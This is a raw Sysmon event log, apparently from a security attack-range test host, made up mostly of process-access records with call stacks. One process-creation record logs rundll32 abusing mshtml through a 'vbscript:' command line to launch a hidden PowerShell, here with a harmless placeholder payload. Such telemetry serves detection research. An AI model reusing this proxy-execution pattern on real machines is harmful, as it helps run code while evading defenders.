15:59:36.975{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026461Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.960{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026460Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.960{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026459Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.960{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026458Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.960{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026457Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.960{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026456Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.960{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026455Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000026454Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.965{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" vbscript:"\..\mshtml,RunHTMLApplication "+String(Close(CreateObject("Wscript.Shell").Run("powershell.exe%%20-nop%%20-Command%%20Write-Host%%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%%20Start-Sleep%%20-Seconds%%202;%%20exit",0,true)),0)C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000026453Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5367-6008-6706-00000000A301}2832C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026452Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026451Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026450Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026449Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026448Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026447Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026446Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026445Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026444Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026443Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026442Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026441Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026440Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026439Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 